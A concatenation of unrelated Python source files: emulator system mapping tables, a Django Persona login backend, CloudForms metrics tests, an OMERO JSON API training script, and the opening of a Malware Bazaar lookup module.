"Sega - SG-1000": {"enabled": True, "defaultCore": "genesis_plus_gx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sinclair - ZX Spectrum +3": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sinclair" },
"SNK - Neo Geo Pocket Color": {"enabled": True, "defaultCore": "mednafen_ngp_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
"SNK - Neo Geo Pocket": {"enabled": True, "defaultCore": "mednafen_ngp_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
#"Sony - PlayStation 3 (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation 3 (Downloadable)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation 3 (PSN)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (DLC)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (PSN)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (PSX2PSP)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (UMD Music)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
#"Sony - PlayStation Portable (UMD Video)": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"Sony - PlayStation Portable": {"enabled": True, "defaultCore": "ppsspp_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"Tiger - Game.com": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Tiger" },
"Tiger - Gizmondo": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Tiger" },
"VTech - CreatiVision": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "VTech" },
"VTech - V.Smile": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "VTech" },
"Watara - Supervision": {"enabled": True, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Watara" },
# Redump.org (disc-based games)
"Apple - Macintosh": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Apple" },
"Bandai - Playdia": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Bandai / Apple - Pippin": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Bandai / Apple" },
"Commodore - Amiga CD": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Amiga CD32": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Commodore - Amiga CDTV": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Commodore" },
"Fujitsu - FM Towns series": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Fujitsu" },
"IBM PC compatible": {"enabled": False, "defaultCore": "", "friendlyName": "PC", "shortName": "", "manufacturer": "(Various)" },
"Mattel - HyperScan": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Mattel" },
"Microsoft - Xbox": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Namco / Sega / Nintendo - Triforce": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"NEC - PC Engine CD - TurboGrafx-CD": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "TurboGrafx-CD", "shortName": "", "manufacturer": "NEC" },
"NEC - PC-88 series": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "NEC" },
"NEC - PC-98 series": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "NEC" },
"NEC - PC-FX - PC-FXGA": {"enabled": False, "defaultCore": "mednafen_pcfx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "NEC" },
"Nintendo - GameCube": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Palm OS": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Palm" },
"Panasonic - 3DO Interactive Multiplayer": {"enabled": False, "defaultCore": "4do_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Panasonic" },
"Philips - CD-i": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Philips" },
"Photo - CD": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"Sega - Chihiro": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Dreamcast": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Lindbergh": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Mega-CD": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Naomi": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"Sega - Saturn": {"enabled": True, "defaultCore": "yabause_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sega" },
"SNK - Neo Geo CD": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
"Sony - PlayStation 2": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"Sony - PlayStation": {"enabled": True, "defaultCore": "mednafen_psx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
"VTech - V.Flash": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "VTech" },
# Seventh-generation consoles (circa 2005)
"Microsoft - Xbox 360": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Nintendo - Wii": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sony - PlayStation 3": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
# Eighth-generation consoles (circa 2012)
"Microsoft - Xbox One": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Nintendo - Wii U": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sony - PlayStation 4": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Sony" },
# Ninth-generation consoles (circa 2017)
"Microsoft - Xbox One X": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Microsoft" },
"Nintendo - Switch": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
}
def phoenixSystems(self):
return OrderedDict(sorted(self.phoenixSystemDatabase.items(), key=lambda t: t[0]))
def libretroToPhoenix(self, libretroSystem):
return self.libretroToPhoenixMap[libretroSystem]
# This map essentially says "Register this Libretro core for this (these) Phoenix system(s)" when a .info file claims support for that system
# If a core claims support for some Libretro ID, register that core for each Phoenix ID
libretroToPhoenixMap = {
"3DO": {"Panasonic - 3DO Interactive Multiplayer"},
"Arcade (various)": {"Arcade"},
"Atari - 2600": {"Atari - 2600"},
"Atari - 5200": {"Atari - 5200"},
"Atari - 7800": {"Atari - 7800"},
"Atari - Jaguar": {"Atari - Jaguar"},
"Atari - Lynx": {"Atari - Lynx"},
"Atari ST/STE/TT/Falcon": {"Atari - ST"},
"Bandai - WonderSwan Color": {"Bandai - WonderSwan Color"},
"Bandai - WonderSwan": {"Bandai - WonderSwan"},
"CHIP-8": {"CHIP-8"},
"Commodore Amiga": {"Commodore - Amiga"},
"Commodore - C128": {"Arcade"},
"Commodore - 64": {"Commodore - 64"},
"CP System I": {"Capcom - CP System I"},
"CP System II": {"Capcom - CP System II"},
"CP System III": {"Capcom - CP System III"},
"CPC": {"Amstrad - CPC"},
"DOS": {"DOS"},
"FB Alpha - Arcade Games": {"Arcade"},
"GCE - Vectrex": {"GCE - Vectrex"},
"Handheld Electronic Game": {"Nintendo - Game & Watch"},
"IBM PC compatible": {"IBM PC compatible"},
"Magnavox - Odyssey2": {"Magnavox - Odyssey2"},
"MAME": {"Arcade"},
"MAME2003": {"Arcade"},
"Microsoft - MSX 2": {"Microsoft - MSX 2"},
"Microsoft - MSX2": {"Microsoft - MSX 2"},
"Microsoft - MSX": {"Microsoft - MSX"},
# MESS and UME
# http://nonmame.retrogames.com/
"MULTI (various)": {
"Atari - 2600",
"Atari - 5200",
"Atari - 7800",
"Atari - Lynx",
"Bandai - WonderSwan Color"
"Bandai - WonderSwan",
"Capcom - CPS Changer",
"Coleco - ColecoVision",
"Fujitsu - FM Towns series",
"Magnavox - Odyssey2",
"Mattel - Intellivision",
"NEC - PC Engine - TurboGrafx 16",
"NEC - PC Engine CD - TurboGrafx-CD",
"NEC - Super Grafx",
"Nintendo - Game Boy Advance",
"Nintendo - Game Boy",
"Philips - Videopac+",
"RCA - Studio II",
"Sega - Game Gear",
"Sega - Master System - Mark III",
"Sega - Mega Drive - Genesis",
"Sega - PICO",
"Sega - SG-1000",
"SNK - Neo Geo CD",
"SNK - Neo Geo",
"Watara - Supervision",
},
"NEC - PC Engine - TurboGrafx 16": {"NEC - PC Engine - TurboGrafx 16"},
"NEC - PC Engine SuperGrafx": {"NEC - Super Grafx"},
"NEC - PC Engine CD - TurboGrafx-CD": {"NEC - Super Grafx"},
"NEC - PC-FX": {"NEC - PC-FX - PC-FXGA"},
"NEC - Super Grafx": {"NEC - Super Grafx"},
"Neo Geo": {"SNK - Neo Geo"},
"Nintendo - 3DS": {"Nintendo - Nintendo 3DS"},
"Nintendo - Family Computer Disk System": {"Nintendo - Nintendo Entertainment System"},
"Nintendo - Famicom Disk System": {"Nintendo - Nintendo Entertainment System"},
"Nintendo - Game & Watch": {"Nintendo - Game & Watch"},
"Nintendo - Game Boy Advance (e-Cards)": {"Nintendo - Game Boy Advance (e-Cards)"},
"Nintendo - Game Boy Advance": {"Nintendo - Game Boy Advance"},
"Nintendo - Game Boy Color": {"Nintendo - Game Boy Color"},
"Nintendo - Game Boy": {"Nintendo - Game Boy"},
"Nintendo - GameCube": {"Nintendo - GameCube"},
"Nintendo - Nintendo 64": {"Nintendo - Nintendo 64"},
"Nintendo - Nintendo 64DD": {"Nintendo - Nintendo 64"},
"Nintendo - Nintendo DS": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo DS (Download Play)": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo DS (Download Play) (BETA)": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo DS Decrypted": {"Nintendo - Nintendo DS"},
"Nintendo - Nintendo Entertainment System": {"Nintendo - Nintendo Entertainment System"},
"Nintendo - Pokemon Mini": {"Nintendo - Pokemon Mini"},
"Nintendo - Sufami Turbo": {"Nintendo - Sufami Turbo"},
"Nintendo - Super Nintendo Entertainment System": {"Nintendo - Super Nintendo Entertainment System"},
"Nintendo - Virtual Boy": {"Nintendo - Virtual Boy"},
"Nintendo - Wii": {"Nintendo - Wii"},
"PC": {"IBM PC compatible"},
"PC-FX": {"NEC - PC-FX - PC-FXGA"},
"PC-98": {"NEC - PC-98 series"},
"Phillips - Videopac+": {"Philips - Videopac+"},
"Sega - 32X": {"Sega - 32X"},
"Sega - Dreamcast": {"Sega - Dreamcast"},
"Sega - Game Gear": {"Sega - Game Gear"},
"Sega - Master System - Mark III": {"Sega - Master System - Mark III"},
"Sega - Mega Drive - Genesis": {"Sega - Mega Drive - Genesis"},
"Sega - Mega-CD - Sega CD": {"Sega - Mega-CD"},
"Sega - NAOMI": {"Sega - Naomi"},
"Sega - PICO": {"Sega - PICO"},
"Sega - Saturn": {"Sega - Saturn"},
"Sega - SG-1000": {"Sega - SG-1000"},
"Sharp - X68000": {"Arcade"},
"Sinclair - ZX 81": {"Sinclair - ZX81"},
"Sinclair - ZX Spectrum": {"Sinclair - ZX Spectrum +3"},
"Sinclair - ZX Spectrum +3": {"Sinclair - ZX Spectrum +3"},
"SNK - Neo Geo Pocket Color": {"SNK - Neo Geo Pocket Color"},
"SNK - Neo Geo Pocket": {"SNK - Neo Geo Pocket"},
"Sony - PlayStation Portable": {"Sony - PlayStation Portable"},
"Sony - PlayStation": {"Sony - PlayStation"},
"The 3DO Company - 3DO": {"Panasonic - 3DO Interactive Multiplayer"},
"Uzebox": {"Arcade"},
"ZX Spectrum (various)": {"Sinclair - ZX Spectrum +3"},
}
# Not all Phoenix IDs are availble in OpenVGDB, fail silently and gracefully if a match isn't found
def phoenixToOpenVGDB(self, phoenixID):
ret = ""
try:
ret = self.phoenixToOpenVGDBMap[phoenixID]
except KeyError:
ret = ""
return ret
phoenixToOpenVGDBMap = {
"Panasonic - 3DO Interactive Multiplayer": "3DO Interactive Multiplayer",
"Arcade": "Arcade",
"Atari - 2600": "Atari 2600",
"Atari - 5200": "Atari 5200",
"Atari - 7800": "Atari 7800",
"Atari - Jaguar": "Atari Jaguar CD",
"Atari - Jaguar": "Atari Jaguar",
"Atari - Lynx": "Atari Lynx",
"Bandai - WonderSwan Color": "Bandai WonderSwan Color",
"Bandai - WonderSwan": "Bandai WonderSwan",
"Coleco - ColecoVision": "Coleco ColecoVision",
"GCE - Vectrex": "GCE Vectrex",
"Mattel - Intellivision": "Intellivision",
"Magnavox - Odyssey2": "Magnavox Odyssey2",
"NEC - PC Engine CD - TurboGrafx-CD": "NEC PC Engine CD/TurboGrafx-CD",
"NEC - PC Engine - TurboGrafx 16": "NEC PC Engine/TurboGrafx-16",
"NEC - PC-FX - PC-FXGA": "NEC PC-FX",
"NEC - Super Grafx": "NEC SuperGrafx",
"Nintendo - Nintendo 64": "Nintendo 64",
"Nintendo - Nintendo DS": "Nintendo DS",
"Nintendo - Nintendo Entertainment System": "Nintendo Entertainment System",
"Nintendo - Nintendo Entertainment System": "Nintendo Famicom Disk System",
"Nintendo - Game Boy Advance": "Nintendo Game Boy Advance",
"Nintendo - Game Boy Color": "Nintendo Game Boy Color",
"Nintendo - Game Boy": "Nintendo Game Boy",
"Nintendo - GameCube": "Nintendo GameCube",
"Nintendo - Super Nintendo Entertainment System": "Nintendo Super Nintendo Entertainment System",
"Nintendo - Virtual Boy": "Nintendo Virtual Boy",
"Nintendo - Wii": "Nintendo Wii",
"Sega - 32X": "Sega 32X",
"Sega - Mega-CD": "Sega CD/Mega-CD",
"Sega - Game Gear": "Sega Game Gear",
"Sega - Mega Drive - Genesis": "Sega Genesis/Mega Drive",
"Sega - Master System - Mark III": "Sega Master System",
"Sega - Saturn": "Sega Saturn",
"Sega - SG-1000": "Sega SG-1000",
"SNK - Neo Geo Pocket Color": "SNK Neo Geo Pocket Color",
"SNK - Neo Geo Pocket": "SNK Neo Geo Pocket",
"Sony - PlayStation Portable": "Sony PlayStation Portable",
"Sony - PlayStation": "Sony PlayStation",
}
def getOpenVGDBToPhoenixMap(self):
return OrderedDict(sorted(self.openVGDBToPhoenixMap.items(), key=lambda t: t[0]))
openVGDBToPhoenixMap = {
"3DO Interactive Multiplayer": "Panasonic - 3DO Interactive Multiplayer",
"Arcade": "Arcade",
"Atari 2600": "Atari - 2600",
"Atari 5200": "Atari - 5200",
"Atari 7800": "Atari - 7800",
"Atari Jaguar CD": "Atari - Jaguar",
"Atari Jaguar": "Atari - Jaguar",
"Atari Lynx": "Atari - Lynx",
"Bandai WonderSwan Color": "Bandai - WonderSwan Color",
"Bandai WonderSwan": "Bandai - WonderSwan",
"Coleco ColecoVision": "Coleco - ColecoVision",
"GCE Vectrex": "GCE - Vectrex",
"Intellivision": "Mattel - Intellivision",
"Magnavox Odyssey2": "Magnavox - Odyssey2",
"NEC PC Engine CD/TurboGrafx-CD": "NEC - PC Engine CD - TurboGrafx-CD",
"NEC PC Engine/TurboGrafx-16": "NEC - PC Engine - TurboGrafx 16",
"NEC PC-FX": "NEC - PC-FX - PC-FXGA",
"NEC SuperGrafx": "NEC - Super Grafx",
"Nintendo 64": "Nintendo - Nintendo 64",
"Nintendo DS": "Nintendo - Nintendo DS",
"Nintendo Entertainment System": "Nintendo - Nintendo Entertainment System",
"Nintendo Famicom Disk System": "Nintendo - Nintendo Entertainment System",
"Nintendo Game Boy Advance": "Nintendo - Game Boy Advance",
"Nintendo Game Boy Color": "Nintendo - Game Boy Color",
"Nintendo Game Boy": "Nintendo - Game Boy",
"Nintendo GameCube": "Nintendo - GameCube",
"Nintendo Super Nintendo Entertainment System": "Nintendo - Super Nintendo Entertainment System",
"Nintendo Virtual Boy": "Nintendo - Virtual Boy",
"Nintendo Wii": "Nintendo - Wii",
"Sega 32X": "Sega - 32X",
"Sega CD/Mega-CD": "Sega - Mega-CD",
"Sega Game Gear": "Sega - Game Gear",
"Sega Genesis/Mega Drive": "Sega - Mega Drive - Genesis",
"Sega Master System": "Sega - Master System - Mark III",
"Sega Saturn": "Sega - Saturn",
"Sega SG-1000": "Sega - SG-1000",
"SNK Neo Geo Pocket Color": "SNK - Neo Geo Pocket Color",
"SNK Neo Geo Pocket": "SNK - Neo Geo Pocket",
"Sony PlayStation Portable": "Sony - PlayStation Portable",
"Sony PlayStation": "Sony - PlayStation",
}
def filterUnusedCores(self):
for key in self.coreInfo["cores"].keys():
if (
# No reason specified
#"4do_libretro" == key
# or "81_libretro" == key
# or "bluemsx_libretro" == key
# or "bsnes_accuracy_libretro" == key
# or "bsnes_balanced_libretro" == key
# or "bsnes_performance_libretro" == key
# or "cap32_libretro" == key
# or "catsfc_libretro" == key
# or "dosbox_libretro" == key
# or "emux_chip8_libretro" == key
# or "fb_alpha_cps1_libretro" == key
# or "fb_alpha_cps2_libretro" == key
# or "fmsx_libretro" == key
# or "gpsp_libretro" == key
# or "gw_libretro" == key
# or "handy_libretro" == key
# or "hatari_libretro" == key
# or "imame4all_libretro" == key
# or "mame078_libretro" == key
# or "mame2010_libretro" == key
# or "mame2014_libretro" == key
# or "meteor_libretro" == key
# or "o2em_libretro" == key
# or "prosystem_libretro" == key
# or "puae_libretro" == key
# or "ume2014_libretro" == key
# or "vecx_libretro" == key
# or "virtualjaguar_libretro" == key
# ARM cores
"pcsx" in key
or "pocketsnes_libretro" == key
):
del self.coreInfo["cores"][key]
|
thomec/tango
|
accounts/authentication.py
|
# accounts/authentication.py
import requests
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'
class PersonaAuthenticationBackend(object):
def authenticate(self, assertion):
logging.warning('entering authenticate function')
response = requests.post(
PERSONA_VERIFY_URL,
data = {'assertion': assertion, 'audience': settings.DOMAIN}
)
logging.warning('got response from persona')
logging.warning(response.content.decode())
if response.ok and response.json()['status'] == 'okay':
email = response.json()['email']
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return User.objects.create(email=email)
else:
logger.warning(
'Persona says no. Json was: {}'.format(response.json())
)
def get_user(self, email):
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return None
|
anurag03/integration_tests
|
cfme/tests/candu/test_utilization_metrics.py
|
# -*- coding: utf-8 -*-
import random
from operator import attrgetter
import pytest
from cfme import test_requirements
from cfme.cloud.provider import CloudProvider
from cfme.cloud.provider.azure import AzureProvider
from cfme.cloud.provider.ec2 import EC2Provider
from cfme.cloud.provider.gce import GCEProvider
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.common.provider import BaseProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.utils import conf
from cfme.utils.blockers import BZ
from cfme.utils.log import logger
from cfme.utils.wait import wait_for
from cfme.fixtures.provider import setup_or_skip
pytestmark = [
pytest.mark.tier(1),
test_requirements.c_and_u,
pytest.mark.provider(
[VMwareProvider, RHEVMProvider, EC2Provider, OpenStackProvider, AzureProvider, GCEProvider],
required_fields=[(['cap_and_util', 'capandu_vm'], 'cu-24x7')], scope="module")
]
@pytest.fixture(scope="module")
def clean_setup_provider(request, provider):
BaseProvider.clear_providers()
setup_or_skip(request, provider)
yield
BaseProvider.clear_providers()
def vm_count(appliance, metrics_tbl, mgmt_system_id):
return bool(appliance.db.client.session.query(metrics_tbl).filter(
metrics_tbl.parent_ems_id == mgmt_system_id).filter(
metrics_tbl.resource_type == "VmOrTemplate").count()
)
def host_count(appliance, metrics_tbl, mgmt_system_id):
return bool(appliance.db.client.session.query(metrics_tbl).filter(
metrics_tbl.parent_ems_id == mgmt_system_id).filter(
metrics_tbl.resource_type == "Host").count()
)
@pytest.fixture(scope="module")
def metrics_collection(appliance, clean_setup_provider, provider, enable_candu):
"""Check the db is gathering collection data for the given provider.
Metadata:
test_flag: metrics_collection
"""
metrics_tbl = appliance.db.client['metrics']
mgmt_systems_tbl = appliance.db.client['ext_management_systems']
logger.info("Fetching provider ID for %s", provider.key)
mgmt_system_id = appliance.db.client.session.query(mgmt_systems_tbl).filter(
mgmt_systems_tbl.name == conf.cfme_data.get('management_systems', {})[provider.key]['name']
).first().id
logger.info("ID fetched; testing metrics collection now")
# vms for both infa and cloud provider
wait_for(
vm_count, [appliance, metrics_tbl, mgmt_system_id],
delay=20,
timeout=1500,
fail_condition=False,
message="wait for VMs")
# host only for infa
if provider.category == "infra":
wait_for(
vm_count, [appliance, metrics_tbl, mgmt_system_id],
delay=20,
timeout=1500,
fail_condition=False,
message="wait for hosts.")
def get_host_name(provider):
cfme_host = random.choice(provider.data["hosts"])
return cfme_host.name
def query_metric_db(appliance, provider, metric, vm_name=None, host_name=None):
metrics_tbl = appliance.db.client['metrics']
ems = appliance.db.client['ext_management_systems']
if vm_name is None:
if host_name is not None:
object_name = host_name
elif vm_name is not None:
object_name = vm_name
with appliance.db.client.transaction:
provs = (
appliance.db.client.session.query(metrics_tbl.id)
.join(ems, metrics_tbl.parent_ems_id == ems.id)
.filter(metrics_tbl.resource_name == object_name,
ems.name == provider.name)
)
return appliance.db.client.session.query(metrics_tbl).filter(
metrics_tbl.id.in_(provs.subquery()))
@pytest.mark.rhv2
# Tests to check that specific metrics are being collected
@pytest.mark.meta(
blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_cpu(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
if provider.category == "infra":
query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
vm_name)
average_rate = attrgetter('cpu_usagemhz_rate_average')
elif provider.category == "cloud":
query = query_metric_db(appliance, provider, 'cpu_usage_rate_average',
vm_name)
average_rate = attrgetter('cpu_usage_rate_average')
for record in query:
if average_rate(record) is not None:
assert average_rate(record) > 0, 'Zero VM CPU Usage'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(EC2Provider) or provider.one_of(GCEProvider))
def test_raw_metric_vm_memory(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
if provider.type == 'azure':
query = query_metric_db(appliance, provider, 'mem_usage_absolute_average',
vm_name)
average_rate = attrgetter('mem_usage_absolute_average')
else:
query = query_metric_db(appliance, provider, 'derived_memory_used',
vm_name)
average_rate = attrgetter('derived_memory_used')
for record in query:
if average_rate(record) is not None:
assert average_rate(record) > 0, 'Zero VM Memory Usage'
break
@pytest.mark.rhv2
@pytest.mark.meta(
blockers=[BZ(1408963, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
@pytest.mark.meta(
blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_network(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
query = query_metric_db(appliance, provider, 'net_usage_rate_average',
vm_name)
for record in query:
if record.net_usage_rate_average is not None:
assert record.net_usage_rate_average > 0, 'Zero VM Network IO'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(EC2Provider))
@pytest.mark.meta(
blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_disk(metrics_collection, appliance, provider):
vm_name = provider.data['cap_and_util']['capandu_vm']
query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
vm_name)
for record in query:
if record.disk_usage_rate_average is not None:
assert record.disk_usage_rate_average > 0, 'Zero VM Disk IO'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_cpu(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
host_name)
for record in query:
if record.cpu_usagemhz_rate_average is not None:
assert record.cpu_usagemhz_rate_average > 0, 'Zero Host CPU Usage'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_memory(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'derived_memory_used',
host_name)
for record in query:
if record.derived_memory_used is not None:
assert record.derived_memory_used > 0, 'Zero Host Memory Usage'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_network(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'net_usage_rate_average',
host_name)
for record in query:
if record.net_usage_rate_average is not None:
assert record.net_usage_rate_average > 0, 'Zero Host Network IO'
break
@pytest.mark.rhv2
@pytest.mark.uncollectif(
lambda provider: provider.one_of(CloudProvider))
@pytest.mark.meta(
blockers=[BZ(1424589, forced_streams=["5.8", "5.9", "upstream"],
unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
def test_raw_metric_host_disk(metrics_collection, appliance, provider):
host_name = get_host_name(provider)
query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
host_name)
for record in query:
if record.disk_usage_rate_average is not None:
assert record.disk_usage_rate_average > 0, 'Zero Host Disk IO'
break
|
jburel/openmicroscopy
|
examples/Training/python/Json_Api/Login.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2016-2017 University of Dundee & Open Microscopy Environment.
# All Rights Reserved.
# Use is subject to license terms supplied in LICENSE.txt
#
import requests
from Parse_OMERO_Properties import USERNAME, PASSWORD, OMERO_WEB_HOST, \
SERVER_NAME
session = requests.Session()
# Start by getting supported versions from the base url...
api_url = '%s/api/' % OMERO_WEB_HOST
print "Starting at:", api_url
r = session.get(api_url)
# we get a list of versions
versions = r.json()['data']
# use most recent version...
version = versions[-1]
# get the 'base' url
base_url = version['url:base']
r = session.get(base_url)
# which lists a bunch of urls as starting points
urls = r.json()
servers_url = urls['url:servers']
login_url = urls['url:login']
projects_url = urls['url:projects']
save_url = urls['url:save']
schema_url = urls['url:schema']
# To login we need to get CSRF token
token_url = urls['url:token']
token = session.get(token_url).json()['data']
print 'CSRF token', token
# We add this to our session header
# Needed for all POST, PUT, DELETE requests
session.headers.update({'X-CSRFToken': token,
'Referer': login_url})
# List the servers available to connect to
servers = session.get(servers_url).json()['data']
print 'Servers:'
for s in servers:
print '-id:', s['id']
print ' name:', s['server']
print ' host:', s['host']
print ' port:', s['port']
# find one called SERVER_NAME
servers = [s for s in servers if s['server'] == SERVER_NAME]
if len(servers) < 1:
raise Exception("Found no server called '%s'" % SERVER_NAME)
server = servers[0]
# Login with username, password and token
payload = {'username': USERNAME,
'password': PASSWORD,
# 'csrfmiddlewaretoken': token, # Using CSRFToken in header instead
'server': server['id']}
r = session.post(login_url, data=payload)
login_rsp = r.json()
assert r.status_code == 200
assert login_rsp['success']
eventContext = login_rsp['eventContext']
print 'eventContext', eventContext
# Can get our 'default' group
groupId = eventContext['groupId']
# With successful login, request.session will contain
# OMERO session details and reconnect to OMERO on
# each subsequent call...
# List projects:
# Limit number of projects per page
payload = {'limit': 2}
data = session.get(projects_url, params=payload).json()
assert len(data['data']) < 3
print "Projects:"
for p in data['data']:
print ' ', p['@id'], p['Name']
# Create a project:
projType = schema_url + '#Project'
# Need to specify target group
url = save_url + '?group=' + str(groupId)
r = session.post(url, json={'Name': 'API TEST foo', '@type': projType})
assert r.status_code == 201
project = r.json()['data']
project_id = project['@id']
print 'Created Project:', project_id, project['Name']
# Get project by ID
project_url = projects_url + str(project_id) + '/'
r = session.get(project_url)
project = r.json()
print project
# Update a project
project['Name'] = 'API test updated'
r = session.put(save_url, json=project)
# Delete a project:
r = session.delete(project_url)
|
slaughterjames/static
|
modules/malware_bazaar_search.py
|
#python imports
import sys
import os
import time
import datetime
import subprocess
import json
import requests
from termcolor import colored
#third-party imports
#No third-party imports
#programmer generated imports
from logger import logger
from fileio import fileio
'''
***BEGIN DESCRIPTION***
Type: Search - Description: Searches for any available data on a target against the Abuse.ch Malware Bazaar database.
***END DESCRIPTION***
'''
def POE(POE):
if (POE.logging == True):
LOG = logger()
newlogentry = ''
reputation_dump = ''
reputation_output_data = ''
malwarebazaar = ''
